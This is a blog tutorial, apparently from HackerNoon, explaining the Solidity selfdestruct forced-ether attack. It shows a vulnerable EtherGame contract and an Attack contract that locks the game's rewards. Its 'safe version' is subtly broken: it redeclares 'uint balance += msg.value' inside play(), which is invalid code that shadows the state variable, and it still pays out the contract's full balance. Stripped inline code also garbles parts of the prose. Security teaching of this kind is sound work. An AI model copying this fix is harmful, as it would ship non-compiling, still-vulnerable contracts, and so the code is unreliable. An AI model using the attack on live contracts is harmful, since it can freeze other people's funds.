The function removes all bytecode from the contract address and sends all ether stored to the specified address. If this specified address is also a contract, no functions (including the fallback) get called. selfdestruct(address) In other words, an attacker can create a contract with a function, send ether to it, call and force ether to be sent to a target. selfdestruct() selfdestruct(target) Let's see how this attack can look like. We create a simple smart contract. Note: I created this contract based on . Solidity by example // SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;



contract EtherGame {
    uint public targetAmount = 5 ether;
    address public winner;

    function play() public payable {
        require(msg.value == 1 ether, "You can only send 1 Ether");

        uint balance = address(this).balance;
        require(balance <= targetAmount, "Game is over");

        if (balance == targetAmount) {
            winner = msg.sender;
        }
    }

    function claimReward() public {
        require(msg.sender == winner, "Not winner");

        (bool sent, ) = msg.sender.call{value: address(this).balance}("");
        require(sent, "Failed to send Ether");
    }
}

contract Attack {
    EtherGame etherGame;

    constructor(EtherGame _etherGame) {
        etherGame = EtherGame(_etherGame);
    }

    function attack() public payable {

        address payable addr = payable(address(etherGame));
        selfdestruct(addr);
    }
} This contract represents a simple game whereby players send 1 ether to the contract hoping to be the one that reaches the threshold equal 5 eth. When the 5 eth will be reached the game is ended and the first player who reaches the milestone may claim a reward. In this case, an attacker can e.g. send to the contract 5 eth or any other value that pushes the contract's balance above the threshold. This would lock all rewards in the contract forever. This is because our if statement in the function checks if the winner's balance is equal 5 eth. play() Preventative Techniques This vulnerability arises from the misuse of . Your contract should avoid being dependent on the exact values of the balance of the contract because it can be artificially manipulated. this.balance If exact values of deposited ether are required, a self-defined variable should be used that gets incremented in payable functions, to safely track the deposited ether. This can prevent your contract to be influenced by the forced ether sent via a call. selfdestruct() Let's see how the safe version of the contract looks like. // SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;



contract EtherGame {
    uint public targetAmount = 5 ether;
    address public winner;
    uint public balance;

    function play() public payable {
        require(msg.value == 1 ether, "You can only send 1 Ether");

        uint balance += msg.value;
        require(balance <= targetAmount, "Game is over");

        if (balance == targetAmount) {
            winner = msg.sender;
        }
    }

    function claimReward() public {
        require(msg.sender == winner, "Not winner");

        (bool sent, ) = msg.sender.call{value: address(this).balance}("");
        require(sent, "Failed to send Ether");
    }
}

contract Attack {
    EtherGame etherGame;

    constructor(EtherGame _etherGame) {
        etherGame = EtherGame(_etherGame);
    }

    function attack() public payable {

        address payable addr = payable(address(etherGame));
        selfdestruct(addr);
    }
} Here, we no longer have any reference to . Instead, we have created a new variable, which keeps tracking of the current amount of eth. this.balance balance Source https://solidity-by-example.org/hacks/self-destruct/ https://blog.sigmaprime.io/solidity-security.html#ether Previously published here.

Target

2022 - HackerNoon Contributor of the Year - Ethereum

2022 - HackerNoon Contributor of the Year - Programming

2022 - HackerNoon Contributor of the Year - Security

2022 - HackerNoon Contributor of the Year - Smart Contracts

2022 - HackerNoon Contributor of the Year - Solidity

Do not forget to follow me 

Nominated for 2022 - HackerNoon Contributor of the Year - Ethereum

Nominated for 2022 - HackerNoon Contributor of the Year - Smart Contracts

Nominated for 2022 - HackerNoon Contributor of the Year - Solidity

Nominated for 2022 - Software Developer of the Year

Nominated for 2022 - HackerNoon Contributor of the Year - Programming

Nominated for 2022 - HackerNoon Contributor of the Year - Security

Too Long; Didn't Read

In your car, at home, or at work — Bosch technology shapes many areas of life.

How to Hack Smart Contracts: Self Destruct and Solidity

How to Hack Smart Contracts: Self Destruct and Solidity

Too Long; Didn't Read

Company Mentioned

Kamil Polak

About Author

TOPICS

Languages

THIS ARTICLE WAS FEATURED IN...

How to Hack Smart Contracts: Self Destruct and Solidity

Too Long; Didn't Read

Company Mentioned

Kamil Polak

About Author

TOPICS

Languages

THIS ARTICLE WAS FEATURED IN...

RELATED STORIES